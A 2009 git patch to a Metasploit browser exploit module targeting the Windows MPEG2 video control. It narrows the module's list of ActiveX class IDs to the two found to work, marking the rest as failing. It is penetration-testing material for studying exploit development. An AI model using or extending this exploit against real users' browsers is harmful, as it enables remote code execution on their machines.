From b9e7e0b902da4a0170afaa65250112e888f1afa1 Mon Sep 17 00:00:00 2001
From: druid <>
Date: Wed, 8 Jul 2009 21:25:23 +0000
Subject: [PATCH] Removed some CLSIDs that didn't work

git-svn-id: file:///home/svn/framework3/trunk@6753 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/windows/browser/msvidctl_mpeg2.rb | 14 +++++++++-----
 1 file changed, 9 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/windows/browser/msvidctl_mpeg2.rb b/modules/exploits/windows/browser/msvidctl_mpeg2.rb
index b70098cc12..1374aa6269 100644
--- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb
+++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb
@@ -92,13 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		return if ((p = regenerate_payload(cli)) == nil)
 
 		# Class IDs
-		clsids = [
-			"011B3619-FE63-4814-8A84-15A194CE9CE3",
-			"0149EEDF-D08F-4142-8D73-D23903D21E90",
-			"0369B4E5-45B6-11D3-B650-00C04F79498E",
+		allclsids = [ # all IDs from the advisory
+			"011B3619-FE63-4814-8A84-15A194CE9CE3", # doesn't work
+			"0149EEDF-D08F-4142-8D73-D23903D21E90", # doesn't work
+			"0369B4E5-45B6-11D3-B650-00C04F79498E", # works
 			"0369B4E6-45B6-11D3-B650-00C04F79498E",
 			"055CB2D7-2969-45CD-914B-76890722F112",
-			"0955AC62-BF2E-4CBA-A2B9-A63F772D46CF",
+			"0955AC62-BF2E-4CBA-A2B9-A63F772D46CF", # works
 			"15D6504A-5494-499C-886C-973C9E53B9F1",
 			"1BE49F30-0E1B-11D3-9D8E-00C04F72D980",
 			"1C15D484-911D-11D2-B632-00C04F79498E",
@@ -139,6 +139,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			"F9769A06-7ACA-4E39-9CFB-97BB35F0E77E",
 			"FA7C375B-66A7-4280-879D-FD459C84BB02"
 		]
+		clsids = [ # these all work
+			"0369B4E5-45B6-11D3-B650-00C04F79498E",
+			"0955AC62-BF2E-4CBA-A2B9-A63F772D46CF",
+		]
 		classid = datastore['ClassID'] || clsids[rand(clsids.size)]
 
 		# Encode the shellcode